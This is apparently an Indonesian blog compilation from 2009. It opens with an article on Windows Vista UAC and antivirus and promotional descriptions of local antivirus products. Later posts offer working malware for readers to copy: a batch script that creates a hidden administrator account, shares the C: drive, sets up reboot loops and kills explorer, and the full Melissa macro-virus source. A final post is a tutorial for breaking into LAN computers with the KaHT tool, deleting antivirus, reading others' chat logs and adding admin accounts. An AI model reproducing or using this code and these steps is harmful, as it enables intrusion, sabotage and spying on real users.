“Windows Vista dilengkapi dengan fitur UAC (User Account Control) yang sangat aman dalam memproteksi komputer dari peng-copian virus ke System dan penulisan Registry. Tetapi, masih perlukan Antivirus?"
Source: http://www.virspector.us.to
Tentu saja semua sudah tahu tentang fitur UAC (User Account Control) pada Windows Vista (dan Seven). Fungsinya adalah membatasi orang – orang untuk menginstalasikan dan menjalankan program secara sembarangan karena bisa saja virus yang dijalankan. Dengan UAC, virus tidak dapat mengcopy ke beberapa tempat seperti Disk System, Direktori Windows (dan Subfolder di dalamnya), Program Files (dan Subfolder di dalamnya), dll.
Selain itu, fitur ini cukup MENGGANGGU karena dimana – mana muncul permintaan apakah kita mengijinkan untuk sebuah program berjalan (Biasanya Installer atau yang terintegrasi dengan Registry) dan sering sekali muncul. Bahkan bila anda menjalankan program Registry Editor (regedit) tetap saja muncul setiap kali program ini dijalankan. Fitur ini bisa anda matikan, tetapi bila anda mengaktifkannya, komputer anda pun cukup aman.
Sekarang, muncul pertanyaan. UAC dapat memblok program untuk meng-copy file ke beberapa direktori dan juga memblok penulisan Registry asalkan program tidak dijalankan pada privilege Administrator (Klik Kanan pada File > Run As Administrator). Nah, pertanyaannya adalah, PERLUKAH ANTIVIRUS PADA SAAT UAC MASIH AKTIF?
Kali ini, VirSpector Lab akan mengetes apakah komputer aman tanpa antivirus? Dengan menggunakan Pengalaman, dapat dengan mudah mengetahui apakah komputer aman tanpa Antivirus biarpun UAC tetap aktif.
A. Brontok Hot News
Sebenarnya, virus Brontok Hot News merupakan nama virus Brontok yang saya buat sendiri nama akhirnya (Hot News) dikarenakan versi Brontok ini menipu user dengan cara membuat file video berformat 3gp yang palsu dan dia pun menyediakan file 3GP Player Setup.exe agar orang – orang yang mencoba menjalankan file 3gp tersebut dengan Quicktime yang sangat sering dipakai untuk menjalankan file 3gp tidak dapat dijalankan (Memang, karena file video itu bahkan tidak berisi apa – apa. Maksudnya tidak berguna). Sebenarnya file ini bukan file Setup, melainkan merupakan file virus. Terlihat bahwa UAC pun langsung muncul saat file Setup ini dijalankan. Setelah diperhatikan, terdapat kata Setup pada file setup palsu tersebut. Setelah mencoba menambahkan kata ‘Setup’ pada sebuah file Executable, terlihat terdapat tanda UAC pada executable itu.
Nah, sekarang saya akan mengetesnya. Sebenarnya ini sudah diimplementasikan pada Software VirSpector Antivirus yang nama programnya merupakan NOT_A_SETUP.exe yang berisi kata Setup pada Filename tersebut. Dan bila Software VirSpector Antivirus dijalankan pada Windows Vista, secara otomatis muncul boks UAC (User Account Control). Bila memilih Allow/Continue, software akan langsung berjalan pada privilege Administrator.
B. Conficker
Virus ini tidak lah menggunakan Executable seperti normalnya virus. Virus ini menggunakan DLL. Untuk menjalankannya, dapat menggunakan rundll32.exe yang ada pada lokasi folder System yang bisa langsung dijalankan. File DLL tidak akan terpengaruh dengan adanya UAC. Maka dari itu, virus ini dapat bekerja dengan senang hati.
C. Kesimpulan
Dari kedua hal tersebut, terlihat bahwa UAC tidak 100% dapat mengamankan komputer anda dari virus biarpun dia dapat menjaga komputer anda dari virus sebanyak kurang lebih 75% saja. 25% lainnya berasal dari Brainware (Pengguna)nya saja. Apakah mudah tertipu dengan teknik Social Engineering atau tidak. Maka dari itu, hati – hatilah! Tetap aktifkan Antivirus anda dan pastikan AV anda Up to date!
Baiklah, semoga artikel ini berguna untuk anda. Terima kasih. 
Saturday, June 13, 2009
Vista dengan UAC aktif. Perlukah Antivirus?
ANTIVIRUS LOKAL YANG PERLU DIPRHITUNGKAN KANCA ITERNASIONAL
1) PCMAV
- PRODUKSI INDONESIA: Antivirus produksi nasional pertama di Indonesia yang berkualitas dalam mengatasi secara tuntas berbagai jenis gangguan virus komputer yang membandel dan dengan database virus terbanyak.
- BERSIH TUNTAS: Dengan daya basmi PCMAV yang tangguh, virus yang membandel sekalipun dapat diburu sekaligus dibersihkan secara tuntas sampai ke “akar-akarnya” tanpa sisa.
- PENYELAMATAN DOKUMEN: Folder maupun file dokumen penting Anda yang disembunyikan (hidden) maupun terinfeksi oleh virus dapat dipulihkan secara sempurna hingga 100% tanpa khawatir risiko kehilangan atau kerusakan pada file.
- PEMULIHAN SISTEM: Settingan registry dan file sistem penting Windows yang telah “rusak”, baik oleh virus maupun akibat penggunaan antivirus lain yang kurang handal, mampu diperbaiki (repair) secara menyeluruh hingga pulih 100%.
- AKURAT: Dengan formula khusus yang unik mampu menjadikan PCMAV sebagai salah satu antivirus terbaik di dunia dalam hal keakuratan pendeteksian, sehingga kesalahan dalam penyelamatan file dapat dihindari.
- AKTIF MELINDUNGI: Dirancang secara pro-aktif untuk memastikan sebuah file yang dijalankan telah bebas virus dan akan menghadang virus sebelum menyebar, bahkan untuk virus baru yang belum dikenal. Jadi Anda pun bisa tenang, karena saat komputer Anda bekerja, PCMAV tak berhenti melindunginya.
- UPDATE OTOMATIS: Kurang lebih 100 virus baru ditemukan di Indonesia setiap bulannya. Secara otomatis, dengan online update secara reguler, PCMAV akan melindungi komputer Anda dari ancaman virus terbaru.
- PEMERIKSAAN MENYELURUH: Teknologi multi-point scanning di PCMAV efektif dalam menghindari lolosnya virus yang mampu otomatis aktif baik sebagai kode injeksi, process, services, sampai yang terjadwal sekalipun.
- MENGENALI VIRUS BARU: Teknologi “GeneticHeuristic” yang unik secara efektif mampu mendeteksi virus baru yang belum dikenal, bahkan untuk virus script baru sekalipun yang sering lolos oleh antivirus lain.
- PENDETEKSIAN TERCEPAT: Dengan algoritma spesial yang terdapat dalam kode komponen inti pendeteksiannya, PCMAV mampu menghasilkan performa tercepat dibanding antivirus lain yang pernah diproduksi di Indonesia.
- DUAL-CORE ENGINE ANTIVIRUS: Engine PCMAV dapat dikombinasikan dengan engine ClamAV yang telah disempurnakan oleh tim PCMAV untuk mendapatkan hasil pendeteksian dan perlindungan virus yang lebih banyak, bahkan hingga 400.000 virus/malware lebih.
Smadav 2009 sudah menemukan kekuatan baru, Smadav 2009 Rev. 3 sudah disempurnakan dengan seluruh fitur yang cukup untuk menggantikan antivirus impor, dengan fitur:
* SmaRT-Protection jauh lebih hebat daripada Rev. 2
* SmaRT-Protection untuk deteksi otomatis Flashdisk, mencegah SEMUA virus lokal & bahkan impor
* SmaRT-Protection sudah support penuh untuk Vista
* Pembersihan Registry sudah support untuk Vista
* Pembersihan total virus-virus lokal baru, khususnya Harry Potter, Virus Shortcut, Yuyun.VBS.
* Penambahan banyak database virus lokal baru dan perbaikan sistem penghitungan database virus.
* dan banyak perbaikan lainnya…
SmaRT-Protection dapat digabungkan dengan proteksi semua produk antivirus manapun. Walaupun Smadav 2009 Rev. 3 sendiri sudah cukup untuk mencegah SEMUA virus lokal & bahkan impor.
3)MORPHOST green
Satu hal yang paling bisa dibanggakan adalah tehnik Morphost sendiri. Dan aku sendiri menjamin keampuhan Morphost kali ini meningkat 80% dari Morphost Revision!.
Aku menyusun ulang heuristiknya. Secara garis besar Heuristik Morphost terbagi 2, yaitu: Fixed Heuristic dan Portable Heuristic
Fixed Heuristic ada 7, diantaranya
1 Read String , gunanya untuk membaca string-string sensitif pada file (aku yakin kebanyakan AV sudah pake heuristik ini)
2. X-Method, gunanya dirahasiakan.
3. Y-Method, gunanya dirahasiakan
4. Z-Method, gunanya dirahasiakan
5. ScanningIcon, gunanya untuk menscan ceksum icon pada file.
6. GetVirusTrap-A, gunanya dirahasiakan
7. GetVirusTrap-B, gunanya dirahasiakan
Kegunaan heuristik diatas sebagian dirahasiakan karena heuristik tersebut adalah heuristik yang sangat gampang. Mungkin AVMaker lain belum menyadarinya…
Portable Heuristic ada satu dan heuristik yang ini tidak akan dibicarakan disini. Heuristik ini dibawa oleh program Pro-Morphost (terpisah dengan Morphost Antivirus). Selain itu Morphost Green juga dilengkapi fitur baru yang kuberi nama “Force Terminate”. Dari namanya saja udah kelihatan kalo fitur ini fungsinya untuk menterminate program (secara paksa). Tapi aku anjurkan kalian menggunakan fitur ini dengan berhati-hati.
4)ANSAV
Ansav adalah salah satu Antivirus terbaik buatan dalam negeri yang dapat menangani virus baik lokal maupun luar.
Ansav memiliki keunggulan daripada Antivirus yang lain adalah Ansav memiliki plugin-plugin tambahan yang memiliki banyak fungsi, sebagai contoh adalah SOR (SimpleOfficeRecover), plugin ini berfungsi untuk memperbaiki file office yang terserang virus dengan metode prepending. Tapi kekurangan plugin ini masih banyak ditemukan bugs-bugs karena si pembuat mengaku masih dalam taraf percobaan. Dan masih banyak plugin-plugin yang menarik lainnya.
Ansav dapat digunanakan dengan 2 cara yaitu portable dan juga dapat diinstal dikomputer.
5)AVIGEN
6)KAV
Kendal AV adalah salah satu AV local yang di program dan dikembangkan oleh pelajar-pelajar dari Kendal. Kendal Av ini sendiri merupakan antivirus yang tergolong masih Newbies dan kurang berpengalaman. Tapi bukanya KAV 2008 ( Kendal AV 2008 ) tidak bis berbuat apa-apa. Banyak sekali keunikan feature dan teknik yang ada pada Kendal AV sehingga memaximalkan performa KAV sendiri. Bahkan sebagian teknik dan feature jarang sekali dijumpai ( saya belum pernah menjumpai ) di AV Lokal lainya. 1 feature andalan KAV yang menjadikan KAV mampu diUpgrade oleh User tanpa harus mendownload KAv versi terbaru (jika ada) dengan membuat data base sendiri. Karena tool User Database memungkinkan KAV dapat membereskan hamper seluruh virus terkecuali Virus yang menggunakan teknik khusus, tentunya dengan bantuan User KAV sendiri. Pada dasarnya sebagian teknik yang digunakan KAV untuk mencari targetnya hasil karya programmer KAV sendiri antara lain L43 pattern (ceksum utama KAV ) ,PCS ( Code special untuk menangani Virus berteknik Stealth/Polymorpich ). Sehingga saya menyadari banyak sekali kekurangan dan kelemahan KAV 2008. Walaupun kekurangan itu diluar control dan kendali saya, saya selalu mencoba untuk memperbaiki kekurangan-kekurangan itu selama masih ada kesempatan dan kekuatan. Disamping itu saya juga sadar tanpa adanya dukungan dana dan kemampuan yang yang cukup saya hanya bias berharap KAV bias terus kami ( team KAV ) kembangkan demi kemajuan IT di kab.Kendal khususnya. Demikianlah gambaran singkat tentang KAV 2008 yang merupakan AV tak berbayar dan tanpa jaminan Apapun.
Berikut merupakan KAV User setting, dimana User dapat mengatur Setting dari aplikasi AV sendiri sesuka User. Dengan settingan User sendirilah juga meentukan kemampuan dan Performa Scanning KAV out sendiri.- Enable Filter Scan
Jika User memberikan tanda centang pada feature/opsi ini, maka File target Scanning dari KAV akan dipilih berdasarkan ukuran file. Sehingga ukuran file yang tidak memungkinkan irus akan dilewati / by passing oleh ceksum L43 sehingga sedikit menambah kecepatan KAV. Walupun sedikit menambah saran saya pakailah feature ini jika melakukan scanning.
- Enable L43 Pattern
Feature ini sangat penting untuk dipakai, karena dengan feature inilah KAV mengenali Virus di Internal DataBase + User Data base ( jika ada )
- Use KAV Heuristic
Feature ini memungkinkan KAv untuk menngenali MalScript yang ada di Komputer anda, tapi teknik Heuristic masih sederhana sehingga harus masih banyak untuk diperbaiki. Tapi teknik selection pada Heuristic KAV memungkinkan terjadinya hanya sedikit kesalahan. Tapi sejauh ini kesalahan itu belum saya dapati.
- Fix infected Doc’xls’exe
Menurut programmer feature ini sangat penting untuk anda, walaupun dengan feature ini kerja KAV agak sedikit lambat saat scanning. Tapi didalam feature inilah teknik PCS dikemas. Dengan teknik inilah kAV mampu mencari virus berteknik kusus yang bias menyusup dalam aplikasi. Smentara virus berteknik kusus yang bias ditangani Code tersebut dalah vbalman. Virus tersebut memang meresahkan masyarkat, karena kebanyakan AV local dapat dilaluinya. Sejauh ini pengujian Code PCS selalu berhasil mendeteksi VBalaman. Hasilnya juga saya cocokan berkali-kali dengan AVG. KAV + AVG sama hasilnya dalam pendeteksian Virus tersebut.
- Fix Lokal registry
Feature ini sebenarnya G’ penting, tapi bagi user awam penting juga she. Feature ini hanya berguna untuk mengembalikan nilai Registry Default yang dikotori virus. Ingat kemungkinan besar feture ini tidk sesuai dengan anda,, karena feature tersebut saya pernah mendapat saran. Sehingga rencana saya kalau masih memungkinkan untuk membuat KAV Hr-1 feature tersebut akan diganti dengan REG tool saja.
- Normalize Sys + Hide File
Feature tersebut berfungsi untuk mengembalikan attribute dari file / folder yang sebagian besar di Hidden oleh virus. Sehingga kadang-kadang user mers telah kehilangan data-datanya.
- Run On Start Up
Memungkinkan KAv berjalan di Start Up ( mungkin feature ini masih bermasalah )
- Enable Process Wather
Feature ini juga sangat penting menurut saya, karena dengan feature ini KAv akan memantau process di memory dan mencocokan dengan Data base internal dan User DataBase ( jika feature digunakan ) dan akan menterminate jika cocok dengan DataBase.
- Adding Your Database
Feature ini untuk menambahkan ceksum yang tersimpan pada User DataBaSE
Monday, June 8, 2009
virus notepad berektensi bat
Nama virus ini C_relwarC708 v1.0 yang dibuat oleh Technocrawl’s core member
Makan nih script…
@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”
rem ****************************************************************************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y
echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”
rem ****************************************************************************************************************************************
cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\
cd %systemroot%\system32
attrib +h +s +r 1001
rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
taskkill /F /IM explorer.exe
rem @ EOV // End of Virus
yang paling menarik dari script di atas penggunaan mssge box-nya…
Ternyata dari batch juga bisa loh bikin mssgbox!
Ini nih aturannya:
msg * ”ketik pesan anda disini”
virus sederhana bagi para pemula
siapa bilang membuat virus harus menggunakan program khusus?
bagi para pemula jangan khawatir sekarang banyak virus yang dibuat dengan sederhana hanya bermodalkan notepad windows .dari sini kita dapat membuat virus sederhana yang mungkin saja engga kalah dengan virus yang dibuat dari program khusus seperti vb06,assembly,c++,broland delphi dan masih banyak lagi.....
virus yang dapat dihasilkan dari notepad ini harus berektensi bat,vbs,db,cmd,inf. sekarang saya akan memberikan contoh virus yang berektensi vbs kamu dapat mengcopynya sesukamu, ingat setelah anda mengcopy simpan dengan berekstensi vbs contoh adnan.vbs
ubah terlebih dahulu type file menjadi all file dijendela save as
Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
ini adalah contoh virus melisa yang pernah meresahkan pengguna komputer
Tuesday, May 5, 2009
Teknik menyusup ke komputer orang lain
Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.
Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Internet. Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname
KaHT (KaHt.exe) … Download program hacker. Berfungsi sebagai program untuk menerobos ke computer server atau client
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.
Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.
Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)
Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac
Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh
antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.
Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt
Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya.
Jika sudah, ini saatnya?
Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : “KaHT Ip1 ip2″
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan
Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho.
Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1″ lalu enter aja Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:\windows\system” milik komputer tujuan / sasaran setelah pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi :
Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe.
Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas
Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..
5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.
Melihat akses guest dan administrator di Windows
Ketik : net user Melihat aktif tidaknya guest di Windows
Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add
Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add
Menghapus akses administrator
Ketik : net localgroup Users /delete
Catatan:
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali.